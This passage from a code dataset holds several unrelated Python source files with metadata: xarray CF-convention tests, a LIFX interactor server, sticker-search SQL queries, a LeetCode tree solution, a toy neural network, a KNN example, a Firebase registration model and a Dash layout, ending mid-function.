mdim_time[:, 1] = noleap_time2\n\n expected1 = times1.values\n expected2 = times2.values\n with warnings.catch_warnings():\n 
warnings.filterwarnings('ignore', 'Unable to decode time axis')\n actual = conventions.decode_cf_datetime(mdim_time, units,\n calendar=calendar)\n self.assertEqual(actual.dtype, np.dtype('M8[ns]'))\n self.assertArrayEqual(actual[:, 0], expected1)\n self.assertArrayEqual(actual[:, 1], expected2)\n\n @requires_netCDF4\n def test_decode_non_standard_calendar_fallback(self):\n import netCDF4 as nc4\n # ensure leap year doesn't matter\n for year in [2010, 2011, 2012, 2013, 2014]:\n for calendar in ['360_day', '366_day', 'all_leap']:\n calendar = '360_day'\n units = 'days since {0}-01-01'.format(year)\n num_times = np.arange(100)\n expected = nc4.num2date(num_times, units, calendar)\n\n with warnings.catch_warnings(record=True) as w:\n warnings.simplefilter('always')\n actual = conventions.decode_cf_datetime(num_times, units,\n calendar=calendar)\n self.assertEqual(len(w), 1)\n self.assertIn('Unable to decode time axis',\n str(w[0].message))\n\n self.assertEqual(actual.dtype, np.dtype('O'))\n self.assertArrayEqual(actual, expected)\n\n @requires_netCDF4\n def test_cf_datetime_nan(self):\n for num_dates, units, expected_list in [\n ([np.nan], 'days since 2000-01-01', ['NaT']),\n ([np.nan, 0], 'days since 2000-01-01',\n ['NaT', '2000-01-01T00:00:00Z']),\n ([np.nan, 0, 1], 'days since 2000-01-01',\n ['NaT', '2000-01-01T00:00:00Z', '2000-01-02T00:00:00Z']),\n ]:\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', 'All-NaN')\n actual = conventions.decode_cf_datetime(num_dates, units)\n expected = np.array(expected_list, dtype='datetime64[ns]')\n self.assertArrayEqual(expected, actual)\n\n def test_infer_datetime_units(self):\n for dates, expected in [(pd.date_range('1900-01-01', periods=5),\n 'days since 1900-01-01 00:00:00'),\n (pd.date_range('1900-01-01 12:00:00', freq='H',\n periods=2),\n 'hours since 1900-01-01 12:00:00'),\n (['1900-01-01', '1900-01-02',\n '1900-01-02 00:00:01'],\n 'seconds since 1900-01-01 00:00:00'),\n (pd.to_datetime(['1900-01-01', '1900-01-02', 'NaT']),\n 'days since 1900-01-01 00:00:00'),\n (pd.to_datetime(['1900-01-01',\n '1900-01-02T00:00:00.005']),\n 'seconds since 1900-01-01 00:00:00'),\n (pd.to_datetime(['NaT', '1900-01-01']),\n 'days since 1900-01-01 00:00:00'),\n (pd.to_datetime(['NaT']),\n 'days since 1970-01-01 00:00:00'),\n ]:\n self.assertEqual(expected, conventions.infer_datetime_units(dates))\n\n def test_cf_timedelta(self):\n examples = [\n ('1D', 'days', np.int64(1)),\n (['1D', '2D', '3D'], 'days', np.array([1, 2, 3], 'int64')),\n ('1h', 'hours', np.int64(1)),\n ('1ms', 'milliseconds', np.int64(1)),\n ('1us', 'microseconds', np.int64(1)),\n (['NaT', '0s', '1s'], None, [np.nan, 0, 1]),\n (['30m', '60m'], 'hours', [0.5, 1.0]),\n ]\n if pd.__version__ >= '0.16':\n # not quite sure why, but these examples don't work on older pandas\n examples.extend([(np.timedelta64('NaT', 'ns'), 'days', np.nan),\n (['NaT', 'NaT'], 'days', [np.nan, np.nan])])\n\n for timedeltas, units, numbers in examples:\n timedeltas = pd.to_timedelta(timedeltas, box=False)\n numbers = np.array(numbers)\n\n expected = numbers\n actual, _ = conventions.encode_cf_timedelta(timedeltas, units)\n self.assertArrayEqual(expected, actual)\n self.assertEqual(expected.dtype, actual.dtype)\n\n if units is not None:\n expected = timedeltas\n actual = conventions.decode_cf_timedelta(numbers, units)\n self.assertArrayEqual(expected, actual)\n self.assertEqual(expected.dtype, actual.dtype)\n\n expected = np.timedelta64('NaT', 'ns')\n actual = conventions.decode_cf_timedelta(np.array(np.nan), 
'days')\n self.assertArrayEqual(expected, actual)\n\n def test_cf_timedelta_2d(self):\n timedeltas, units, numbers = ['1D', '2D', '3D'], 'days', np.atleast_2d([1, 2, 3])\n\n timedeltas = np.atleast_2d(pd.to_timedelta(timedeltas, box=False))\n expected = timedeltas\n\n actual = conventions.decode_cf_timedelta(numbers, units)\n self.assertArrayEqual(expected, actual)\n self.assertEqual(expected.dtype, actual.dtype)\n\n def test_infer_timedelta_units(self):\n for deltas, expected in [\n (pd.to_timedelta(['1 day', '2 days']), 'days'),\n (pd.to_timedelta(['1h', '1 day 1 hour']), 'hours'),\n (pd.to_timedelta(['1m', '2m', np.nan]), 'minutes'),\n (pd.to_timedelta(['1m3s', '1m4s']), 'seconds')]:\n self.assertEqual(expected, conventions.infer_timedelta_units(deltas))\n\n def test_invalid_units_raises_eagerly(self):\n ds = Dataset({'time': ('time', [0, 1], {'units': 'foobar since 123'})})\n with self.assertRaisesRegexp(ValueError, 'unable to decode time'):\n decode_cf(ds)\n\n @requires_netCDF4\n def test_dataset_repr_with_netcdf4_datetimes(self):\n # regression test for #347\n attrs = {'units': 'days since 0001-01-01', 'calendar': 'noleap'}\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', 'unable to decode time')\n ds = decode_cf(Dataset({'time': ('time', [0, 1], attrs)}))\n self.assertIn('(time) object', repr(ds))\n\n attrs = {'units': 'days since 1900-01-01'}\n ds = decode_cf(Dataset({'time': ('time', [0, 1], attrs)}))\n self.assertIn('(time) datetime64[ns]', repr(ds))\n\n\nclass TestNativeEndiannessArray(TestCase):\n def test(self):\n x = np.arange(5, dtype='>i8')\n expected = np.arange(5, dtype='int64')\n a = conventions.NativeEndiannessArray(x)\n assert a.dtype == expected.dtype\n assert a.dtype == expected[:].dtype\n self.assertArrayEqual(a, expected)\n\n\n@requires_netCDF4\nclass TestEncodeCFVariable(TestCase):\n def test_incompatible_attributes(self):\n invalid_vars = [\n Variable(['t'], pd.date_range('2000-01-01', periods=3),\n {'units': 'foobar'}),\n Variable(['t'], pd.to_timedelta(['1 day']), {'units': 'foobar'}),\n Variable(['t'], [0, 1, 2], {'add_offset': 0}, {'add_offset': 2}),\n Variable(['t'], [0, 1, 2], {'_FillValue': 0}, {'_FillValue': 2}),\n ]\n for var in invalid_vars:\n with self.assertRaises(ValueError):\n conventions.encode_cf_variable(var)\n\n def test_missing_fillvalue(self):\n v = Variable(['x'], np.array([np.nan, 1, 2, 3]))\n v.encoding = {'dtype': 'int16'}\n with self.assertWarns('floating point data as an integer'):\n conventions.encode_cf_variable(v)\n\n\n@requires_netCDF4\nclass TestDecodeCF(TestCase):\n def test_dataset(self):\n original = Dataset({\n 't': ('t', [0, 1, 2], {'units': 'days since 2000-01-01'}),\n 'foo': ('t', [0, 0, 0], {'coordinates': 'y', 'units': 'bar'}),\n 'y': ('t', [5, 10, -999], {'_FillValue': -999})\n })\n expected = Dataset({'foo': ('t', [0, 0, 0], {'units': 'bar'})},\n {'t': pd.date_range('2000-01-01', periods=3),\n 'y': ('t', [5.0, 10.0, np.nan])})\n actual = conventions.decode_cf(original)\n self.assertDatasetIdentical(expected, actual)\n\n def test_invalid_coordinates(self):\n # regression test for GH308\n original = Dataset({'foo': ('t', [1, 2], {'coordinates': 'invalid'})})\n actual = conventions.decode_cf(original)\n self.assertDatasetIdentical(original, actual)\n\n def test_decode_coordinates(self):\n # regression test for GH610\n original = Dataset({'foo': ('t', [1, 2], {'coordinates': 'x'}),\n 'x': ('t', [4, 5])})\n actual = conventions.decode_cf(original)\n self.assertEqual(actual.foo.encoding['coordinates'], 
'x')\n\n def test_0d_int32_encoding(self):\n original = Variable((), np.int32(0), encoding={'dtype': 'int64'})\n expected = Variable((), np.int64(0))\n actual = conventions.maybe_encode_dtype(original)\n self.assertDatasetIdentical(expected, actual)\n\n def test_decode_cf_with_multiple_missing_values(self):\n original = Variable(['t'], [0, 1, 2],\n {'missing_value': np.array([0, 1])})\n expected = Variable(['t'], [np.nan, np.nan, 2], {})\n with warnings.catch_warnings(record=True) as w:\n actual = conventions.decode_cf_variable(original)\n self.assertDatasetIdentical(expected, actual)\n self.assertIn('variable has multiple fill', str(w[0].message))\n\n def test_decode_cf_with_drop_variables(self):\n original = Dataset({\n 't': ('t', [0, 1, 2], {'units': 'days since 2000-01-01'}),\n 'x': (\"x\", [9, 8, 7], {'units': 'km'}),\n 'foo': (('t', 'x'), [[0, 0, 0], [1, 1, 1], [2, 2, 2]], {'units': 'bar'}),\n 'y': ('t', [5, 10, -999], {'_FillValue': -999})\n })\n expected = Dataset({\n 't': pd.date_range('2000-01-01', periods=3),\n 'x': (\"x\", [0, 1, 2]),\n 'foo': (('t', 'x'), [[0, 0, 0], [1, 1, 1], [2, 2, 2]], {'units': 'bar'}),\n 'y': ('t', [5, 10, np.nan])\n })\n actual = conventions.decode_cf(original, drop_variables=(\"x\",))\n actual2 = conventions.decode_cf(original, drop_variables=\"x\")\n self.assertDatasetIdentical(expected, actual)\n self.assertDatasetIdentical(expected, actual2)\n\n\nclass CFEncodedInMemoryStore(WritableCFDataStore, InMemoryDataStore):\n pass\n\n\nclass NullWrapper(utils.NDArrayMixin):\n \"\"\"\n Just for testing, this lets us create a numpy array directly\n but make it look like its not in memory yet.\n \"\"\"\n def __init__(self, array):\n self.array = array\n\n def __getitem__(self, key):\n return self.array[indexing.orthogonal_indexer(key, self.shape)]\n\n\ndef null_wrap(ds):\n \"\"\"\n Given a data store this wraps each variable in a NullWrapper so that\n it appears to be out of memory.\n \"\"\"\n variables = dict((k, Variable(v.dims, NullWrapper(v.values), v.attrs))\n for k, v in iteritems(ds))\n return InMemoryDataStore(variables=variables, attributes=ds.attrs)\n\n\n@requires_netCDF4\nclass TestCFEncodedDataStore(CFEncodedDataTest, TestCase):\n @contextlib.contextmanager\n def create_store(self):\n yield CFEncodedInMemoryStore()\n\n @contextlib.contextmanager\n def roundtrip(self, data, save_kwargs={}, open_kwargs={}):\n store = CFEncodedInMemoryStore()\n data.dump_to_store(store, **save_kwargs)\n yield open_dataset(store, **open_kwargs)\n\n def test_roundtrip_coordinates(self):\n raise unittest.SkipTest('cannot roundtrip coordinates yet for '\n 'CFEncodedInMemoryStore')\n\n def test_invalid_dataarray_names_raise(self):\n pass\n\n def test_encoding_kwarg(self):\n pass\n","sub_path":"xarray/test/test_conventions.py","file_name":"test_conventions.py","file_ext":"py","file_size_in_byte":28068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"93880243","text":"from interactor.request_handlers import CommandHandler, WSHandler\nfrom interactor.commander.animations import Animations\n\nfrom photons_app import helpers as hp\n\nfrom photons_control.device_finder import DeviceFinderDaemon, Finder\n\nfrom whirlwind.commander import Commander\nfrom whirlwind.server import Server\nimport logging\nimport time\n\nlog = logging.getLogger(\"interactor.server\")\n\n\nclass Server(Server):\n def __init__(self, final_future, *, server_end_future, store=None):\n super().__init__(final_future, 
server_end_future=server_end_future)\n\n if store is None:\n from interactor.commander.store import store, load_commands\n\n load_commands()\n\n self.store = store\n self.wsconnections = {}\n\n async def wait_for_end(self):\n await hp.wait_for_all_futures(self.server_end_future, name=\"Server::wait_for_end\")\n\n def tornado_routes(self):\n return [\n (\"/v1/lifx/command\", CommandHandler, {\"commander\": self.commander}),\n (\n \"/v1/ws\",\n WSHandler,\n {\n \"commander\": self.commander,\n \"server_time\": time.time(),\n \"final_future\": self.server_end_future,\n \"wsconnections\": self.wsconnections,\n },\n ),\n ]\n\n async def setup(self, server_options, *, tasks, sender, cleaners, animation_options=None):\n self.sender = sender\n self.cleaners = cleaners\n self.server_options = server_options\n self.animation_options = animation_options\n\n self.tasks = tasks\n self.tasks._merged_options_formattable = True\n\n self.db_queue = __import__(\"interactor.database.db_queue\").database.db_queue.DBQueue(\n self.final_future, 5, lambda exc: 1, self.server_options.database.uri\n )\n self.cleaners.append(self.db_queue.finish)\n self.db_queue.start()\n\n self.finder = Finder(sender, final_future=self.final_future)\n self.finder._merged_options_formattable = True\n self.cleaners.append(self.finder.finish)\n\n self.daemon = DeviceFinderDaemon(sender, finder=self.finder)\n self.cleaners.append(self.daemon.finish)\n await self.daemon.start()\n\n self.animations = Animations(\n self.final_future, self.tasks, self.sender, self.animation_options\n )\n self.animations._merged_options_formattable = True\n\n self.commander = Commander(\n self.store,\n tasks=self.tasks,\n sender=self.sender,\n finder=self.finder,\n db_queue=self.db_queue,\n animations=self.animations,\n final_future=self.final_future,\n server_options=self.server_options,\n )\n\n async def cleanup(self):\n self.tasks.add(self.animations.stop())\n await hp.wait_for_all_futures(\n *self.wsconnections.values(), name=\"Server::cleanup[wait_for_wsconnections]\"\n )\n","sub_path":"apps/interactor/interactor/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"550006455","text":"\"\"\"Query composition for inline search.\"\"\"\nfrom sqlalchemy import func, case, cast, Numeric, or_\n\nfrom stickerfinder.models import (\n Sticker,\n StickerSet,\n sticker_tag,\n Tag,\n)\n\n\ndef get_strict_matching_stickers(session, tags, nsfw, furry, offset, is_default_language):\n \"\"\"Query all strictly matching stickers for given tags.\"\"\"\n matching_stickers = get_strict_matching_query(session, tags, nsfw, furry, is_default_language)\n\n matching_stickers = matching_stickers.offset(offset) \\\n .limit(50) \\\n .all()\n\n return matching_stickers\n\n\ndef get_fuzzy_matching_stickers(session, tags, nsfw, furry, offset, is_default_language):\n \"\"\"Get fuzzy matching stickers.\"\"\"\n matching_stickers = get_fuzzy_matching_query(session, tags, nsfw, furry, offset, is_default_language) \\\n .offset(offset) \\\n .limit(50) \\\n .all()\n\n return matching_stickers\n\n\ndef get_strict_matching_sticker_sets(session, tags, nsfw, furry, offset, is_default_language):\n \"\"\"Get all sticker sets by accumulated score for strict search.\"\"\"\n strict_subquery = get_strict_matching_query(session, tags, nsfw, furry, is_default_language, sticker_set=True) \\\n .subquery('strict_sticker_subq')\n\n score = 
func.sum(strict_subquery.c.score).label('score')\n matching_sets = session.query(StickerSet, score) \\\n .join(strict_subquery, StickerSet.name == strict_subquery.c.name) \\\n .group_by(StickerSet) \\\n .order_by(score.desc()) \\\n .limit(8) \\\n .offset(offset) \\\n .all()\n\n return matching_sets\n\n\ndef get_strict_matching_query(session, tags, nsfw, furry, is_default_language, sticker_set=False):\n \"\"\"Get the query for strict tag matching.\"\"\"\n tag_count = func.count(sticker_tag.c.tag_name).label(\"tag_count\")\n tag_subq = session.query(sticker_tag.c.sticker_file_id, tag_count) \\\n .join(Tag) \\\n .filter(or_(Tag.is_default_language == is_default_language, Tag.is_default_language == True)) \\\n .filter(sticker_tag.c.tag_name.in_(tags)) \\\n .group_by(sticker_tag.c.sticker_file_id) \\\n .subquery(\"tag_subq\")\n\n # Condition for matching sticker set names and titles\n set_conditions = []\n for tag in tags:\n set_conditions.append(case([\n (StickerSet.name.like(f'%{tag}%'), 0.75),\n (StickerSet.title.like(f'%{tag}%'), 0.75),\n ], else_=0))\n\n # Condition for matching sticker text\n text_conditions = []\n for tag in tags:\n text_conditions.append(case([(Sticker.text.like(f'%{tag}%'), 0.40)], else_=0))\n\n # Compute the whole score\n score = cast(func.coalesce(tag_subq.c.tag_count, 0), Numeric)\n for condition in set_conditions + text_conditions:\n score = score + condition\n score = score.label('score')\n\n # Query the whole sticker set in case we actually want to query sticker sets\n intermediate_query = session.query(Sticker.file_id, StickerSet.name, score)\n\n # Compute the score for all stickers and filter nsfw stuff\n # We do the score computation in a subquery, since it would otherwise be recomputed for statement.\n intermediate_query = intermediate_query \\\n .outerjoin(tag_subq, Sticker.file_id == tag_subq.c.sticker_file_id) \\\n .join(Sticker.sticker_set) \\\n .filter(StickerSet.banned.is_(False)) \\\n .filter(StickerSet.reviewed.is_(True)) \\\n .filter(StickerSet.nsfw.is_(nsfw)) \\\n .filter(StickerSet.furry.is_(furry)) \\\n .filter(or_(StickerSet.is_default_language == is_default_language, StickerSet.is_default_language == True)) \\\n .subquery('strict_intermediate')\n\n if sticker_set:\n matching_stickers = session.query(\n intermediate_query.c.file_id,\n intermediate_query.c.name,\n intermediate_query.c.score\n )\n else:\n matching_stickers = session.query(intermediate_query.c.file_id, intermediate_query.c.score)\n # Now filter and sort by the score. 
Ignore the score threshold when searching for nsfw\n matching_stickers = matching_stickers \\\n .filter(or_(intermediate_query.c.score > 0, nsfw, furry)) \\\n .order_by(intermediate_query.c.score.desc(), intermediate_query.c.name, intermediate_query.c.file_id)\n\n return matching_stickers\n\n\ndef get_fuzzy_matching_query(session, tags, nsfw, furry, offset, is_default_language):\n \"\"\"Query all fuzzy matching stickers.\"\"\"\n threshold = 0.3\n # Create a query for each tag, which fuzzy matches all tags and computes the distance\n matching_tags = []\n for tag in tags:\n tag_query = session.query(Tag.name.label('tag_name'), func.similarity(Tag.name, tag).label('tag_similarity')) \\\n .filter(func.similarity(Tag.name, tag) >= threshold) \\\n .filter(or_(Tag.is_default_language == is_default_language, Tag.is_default_language == True))\n matching_tags.append(tag_query)\n\n # Union all fuzzy matched tags\n if len(matching_tags) > 1:\n matching_tags = matching_tags[0].union(*matching_tags[1:])\n else:\n matching_tags = matching_tags[0]\n matching_tags = matching_tags.subquery('matching_tags')\n\n # Group all matching tags to get the max score of the best matching searched tag.\n fuzzy_subquery = session.query(matching_tags.c.tag_name, func.max(matching_tags.c.tag_similarity).label('tag_similarity')) \\\n .group_by(matching_tags.c.tag_name) \\\n .subquery()\n\n # Get all stickers which match a tag, together with the accumulated score of the fuzzy matched tags.\n fuzzy_score = func.sum(fuzzy_subquery.c.tag_similarity).label(\"fuzzy_score\")\n tag_subq = session.query(sticker_tag.c.sticker_file_id, fuzzy_score) \\\n .join(fuzzy_subquery, sticker_tag.c.tag_name == fuzzy_subquery.c.tag_name) \\\n .group_by(sticker_tag.c.sticker_file_id) \\\n .subquery(\"tag_subq\")\n\n # Condition for matching sticker set names and titles\n set_conditions = []\n for tag in tags:\n set_conditions.append(case([\n (func.similarity(StickerSet.name, tag) >= threshold, func.similarity(StickerSet.name, tag)),\n (func.similarity(StickerSet.title, tag) >= threshold, func.similarity(StickerSet.title, tag)),\n ], else_=0))\n\n # Condition for matching sticker text\n text_conditions = []\n for tag in tags:\n text_conditions.append(case([(func.similarity(Sticker.text, tag) >= threshold, 0.30)], else_=0))\n\n # Compute the whole score\n score = cast(func.coalesce(tag_subq.c.fuzzy_score, 0), Numeric)\n for condition in set_conditions + text_conditions:\n score = score + condition\n score = score.label('score')\n\n # Query all strict matching results to exclude them.\n strict_subquery = get_strict_matching_query(session, tags, nsfw, furry, is_default_language) \\\n .subquery('strict_subquery')\n\n # Compute the score for all stickers and filter nsfw stuff\n # We do the score computation in a subquery, since it would otherwise be recomputed for statement.\n intermediate_query = session.query(Sticker.file_id, StickerSet.title, score) \\\n .outerjoin(tag_subq, Sticker.file_id == tag_subq.c.sticker_file_id) \\\n .outerjoin(strict_subquery, Sticker.file_id == strict_subquery.c.file_id) \\\n .join(Sticker.sticker_set) \\\n .filter(strict_subquery.c.file_id.is_(None)) \\\n .filter(StickerSet.banned.is_(False)) \\\n .filter(StickerSet.reviewed.is_(True)) \\\n .filter(StickerSet.nsfw.is_(nsfw)) \\\n .filter(StickerSet.furry.is_(furry)) \\\n .filter(or_(StickerSet.is_default_language == is_default_language, StickerSet.is_default_language == True)) \\\n .subquery('fuzzy_intermediate')\n\n # Now filter and sort by the score. 
Ignore the score threshold when searching for nsfw\n matching_stickers = session.query(intermediate_query.c.file_id, intermediate_query.c.score) \\\n .filter(or_(intermediate_query.c.score > 0, nsfw, furry)) \\\n .order_by(intermediate_query.c.score.desc(), intermediate_query.c.title, intermediate_query.c.file_id) \\\n\n return matching_stickers\n","sub_path":"stickerfinder/helper/inline_query.py","file_name":"inline_query.py","file_ext":"py","file_size_in_byte":8087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"581749886","text":"#\n# @lc app=leetcode id=2583 lang=python3\n#\n# [2583] Kth Largest Sum in a Binary Tree\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def kthLargestLevelSum(self, root: Optional[TreeNode], k: int) -> int:\n\n vals = []\n stack = [(root, 0)]\n while stack:\n node, i = stack.pop()\n if i == len(vals):\n vals.append(0)\n vals[i] += node.val\n\n if node.left:\n stack.append((node.left, i + 1))\n\n if node.right:\n stack.append((node.right, i + 1))\n\n return sorted(vals, reverse=True)[k - 1] if len(vals) >= k else -1\n \n# @lc code=end\n\n","sub_path":"2583.kth-largest-sum-in-a-binary-tree.py","file_name":"2583.kth-largest-sum-in-a-binary-tree.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"424855030","text":"# -*- coding: utf-8 -*-\n# Back-Propagation Neural Networks by Tangent\n\n##-Starting---------------------------------------------------------------------\nimport platform\nif \"windows\" in platform.platform().lower():path = 'D:/pydata-book/ch05/'\nelse:path = '/Users/Tangent/Desktop/my-learning/'\nimport numpy as np\nimport pandas as pd\n##-Done-------------------------------------------------------------------------\n\ndata=pd.read_csv(path+'votedata.csv')\nm=len(data)\nsequence=np.random.permutation(m)\ntrain_set=data.ix[sequence[:1000]]\ntrain_set.index=range(1000)\ntest_set=data.ix[sequence[1000:]]\ntest_set.index=range(m-1000)\n\ndef sigmoid(x):\n # Symmetrical sigmoid\n return 1/(1+np.exp(-x))\nvsigmoid = np.vectorize(sigmoid)\n\ndef dsigmoid(y):\n return y - y**2\nvdsigmoid = np.vectorize(dsigmoid)\n\nclass NN:\n def __init__(self, i_num, h_num, no):\n self.ni = i_num+1\n self.nh = h_num+1\n self.no = no\n # Initialize numpy arrays of ones with default dtype float\n self.ai = np.ones((self.ni,1), dtype=float)\n self.ah = np.ones((self.nh,1), dtype=float)\n self.ao = np.ones((self.no,1), dtype=float)\n # initialize weights random in range [-0.2, 0.2)\n self.wi = (np.random.random_sample((self.ni, self.nh-1)) - 0.5) * 0.4\n # Make random matrix with values in range [-2., 2.)\n self.wh = (np.random.random_sample((self.nh, self.no)) - 0.5) * 0.4\n # last change in weights for momentum ??\n \n def update(self, inputs):\n if len(inputs) != self.ni - 1:\n raise ValueError(\"Wrong number of inputs\")\n\n # input activations\n self.ai[1:,0] = inputs\n\n # hidden activations\n # shapes: (nh,1) = (nh,sni) x (sni,1)\n self.ah[1:] = vsigmoid( self.wi.T.dot(self.ai) )\n\n # output activations\n # shapes: (no,1) = (no,nh) x (nh,1)\n self.ao = vsigmoid( self.wh.T.dot(self.ah) )\n\n return self.ao\n \n def backPropagate(self, targets, N):\n if len(targets) != self.no:\n raise ValueError('Wrong number of target values')\n # Assume 'targets' has shape 
(no,1)\n error = targets - self.ao\n # with a sigmoid output layer and cross-entropy loss the output delta is simply the error\n # (no,1) * constant:\n output_deltas = error\n # (nh,1) = (nh,no) matrix times (no,1) column vector:\n error = self.wh.dot(output_deltas)\n # (nh,1) * constant:\n hidden_deltas = vdsigmoid(self.ah[1:]) * error[1:]\n # (nh,no) matrix = (nh,1) column vector times (1,no) row vector:\n change = self.ah.dot(output_deltas.T)\n self.wh += N*change\n # (self.ni,nh) = (self.ni,1) x (1,nh):\n change = self.ai.dot(hidden_deltas.T)\n # Each of these objects (except N,M) has shape (self.ni,nh):\n self.wi += N*change\n # Cross-entropy loss: element-wise logarithms, then sum over \n #[self.no] elements \n error = np.sum(-targets*np.log(self.ao)-(1-targets)*np.log(1-self.ao))\n return error \n \n def train(self, patterns, iterations=5, N=0.1):\n # N: learning rate\n errs = []\n for i in range(iterations):\n error = 0.0\n # Do backpropagation training one data point at time:\n for p in range(len(patterns)):\n inputs = np.array(patterns.ix[p][1:9])\n targets = patterns.ix[p][11:15]\n self.update(inputs)\n error = error + self.backPropagate(np.array(targets).reshape((\n len(targets),1)), N) \n errs.append(error)\n print('error %0.5f' % error)\n return errs # Uncomment this to get training error as function\n \n def test(self, patterns):\n s=0.\n for p in range(len(patterns)):\n a=patterns.ix[p][10]\n b=np.sum(np.round(self.update(np.array(patterns.ix[p][1:9]))))\n c=np.round(self.update(np.array(patterns.ix[p][1:9])))\n s=s+(a-b<0.01)\n #print(a, '->', b)\n print(s/len(patterns))\n \n def weights(self):\n print('Input weights:')\n for i in range(self.ni):\n print(self.wi[i])\n print()\n print('Output weights:')\n for j in range(self.nh):\n print(self.wh[j])\n \n\n \nexc=NN(8,9,4)\nexc.train(train_set,5,0.1)\n#exc.test(test_set)\nexc.weights()","sub_path":"NN_tan.py","file_name":"NN_tan.py","file_ext":"py","file_size_in_byte":4397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"637221667","text":"#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom sklearn.datasets import load_iris, load_digits, fetch_20newsgroups, load_boston\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\ndef knniris():\n \"\"\"\n k近邻分析\n k值取多大,有什么影响:\n 1. k值取很小:容易受到异常因素的影响\n 2. k值取很大:近邻的样本太多,准确率受到影响\n 性能问题:\n 时间复杂度,消耗资源\n :return:\n \"\"\"\n # 1. 准备数据集,数据的分割\n li = load_iris()\n x_train, x_test, y_train, y_test = train_test_split(li.data, li.target, test_size=0.25)\n\n # 2. 数据的标准化处理\n std = StandardScaler()\n\n x_train = std.fit_transform(x_train)\n\n # reuse the scaler fitted on the training split; refitting on the test split leaks information\n x_test = std.transform(x_test)\n\n # 3. 
estimator流程\n knn = KNeighborsClassifier()\n\n knn.fit(x_train, y_train)\n\n # 测试集预测的目标值\n y_predict = knn.predict(x_test)\n\n print(y_predict, y_test)\n\n # 计算准确率\n score = knn.score(x_test, y_test)\n\n print(\"预测的准确率为:\", score)\n\n return None\n\nif __name__ == '__main__':\n knniris()\n","sub_path":"3_k近邻分析.py","file_name":"3_k近邻分析.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"96138404","text":"from firebase_admin import db, auth\nfrom ficheros.codigo import Generador\nclass RegistrarModel:\n def registrar_usuario_cliente(self,datos,ruta):\n try:\n user = auth.create_user(email=datos['correo_usuario_registrar'],\n phone_number=\"+57\"+datos['telefono_usuario_registrar'],\n display_name=datos['nombre_usuario_registrar'],\n password=datos['password_usuario_registrar'])\n \n datos_guardar = {\n 'uid_user_registra':datos['uid_usuario'],\n 'uid_user':user.uid,\n 'nombre_gerente':datos['nombre_usuario_registrar'],\n 'apellido_gerente':datos['apellido_usuario_registrar'],\n 'telefono_usuario':datos['telefono_usuario_registrar'],\n 'correo_usuario':datos['correo_usuario_registrar'],\n }\n ref = db.reference()\n ref.child('geo'+ruta).child(user.uid).set(datos_guardar)\n\n return True,''\n except Exception as e:\n print(e)\n generator = Generador()\n codigo = generator.validarGuardarInformacionError('000','crear usuario','POST','admin')\n return False,codigo\n\n def registrar_tienda(self,datos):\n try:\n datos_guardar = {\n 'uid_user_registra':datos['uid_usuario'],\n 'nombre_sede_tienda':datos['nombre_tienda_registrar'],\n 'latitud_tienda':datos['latitud_tienda'],\n 'longitud_tienda':datos['longitud_tienda'],\n 'zona_influencia':datos['zona_influencia'],\n 'estado_disponibilidad':False,\n 'admin-tienda_asignado':''\n }\n ref = db.reference()\n ref.child('geoTIENDAS').push(datos_guardar)\n return True,''\n except Exception as e:\n print(e)\n generator = Generador()\n codigo = generator.validarGuardarInformacionError('000','crear usuario','POST','admin')\n return False,codigo \n\n def registrar_cliente(self,datos):\n try:\n user = auth.create_user(email=datos['correo_cliente'],\n phone_number=\"+57\"+datos['telefono_cliente'],\n display_name=datos['nombre_cliente'],\n password=datos['password_cliente'])\n \n datos_guardar = {\n 'nombre_cliente':datos['nombre_cliente'],\n 'cedula_cliente':datos['cedula_cliente'],\n 'apellido_cliente':datos['apellido_cliente'],\n 'telefono_cliente':datos['telefono_cliente'],\n 'correo_cliente':datos['correo_cliente'],\n }\n ref = db.reference()\n ref.child('geoCLIENTES').child(user.uid).set(datos_guardar)\n\n return True,''\n except Exception as e:\n print(e)\n generator = Generador()\n codigo = generator.validarGuardarInformacionError('','crear cliente','','')\n return False,codigo ","sub_path":"mype/model/registrar_model.py","file_name":"registrar_model.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"47388678","text":"import dash_html_components as html\n\nlayout = html.Div(\n children=[\n html.H1(children=\"Dashboard 1\"),\n html.Div(\n children=\"\"\"\n This dashboard is first\n \"\"\"\n ),\n ]\n)\n\ndef create_app(factory):\n app = factory(__name__)\n app.layout = layout\n return 
app","sub_path":"examples/simple_example/dashboard_1.py","file_name":"dashboard_1.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"188911851","text":"from __future__ import absolute_import, division, print_function\n\nimport numpy as np\nimport numpy.ma as ma\n\nfrom pandas import Index, Series\n\nfrom .utilities import Path, rolling_window\n\ndata_path = Path(__file__).parents[1].joinpath('tests', 'data')\n\n\ndef despike(self, n1=2, n2=20, block=100, keep=0):\n \"\"\"\n Wild Edit Seabird-like function. Passes with Standard deviation\n `n1` and `n2` with window size `block`.\n\n \"\"\"\n\n data = self.values.astype(float).copy()\n roll = rolling_window(data, block)\n roll = ma.masked_invalid(roll)\n std = n1 * roll.std(axis=1)\n mean = roll.mean(axis=1)\n # Use the last value to fill-up.\n std = np.r_[std, np.tile(std[-1], block - 1)]\n mean = np.r_[mean, np.tile(mean[-1], block - 1)]\n mask = (np.abs(data - 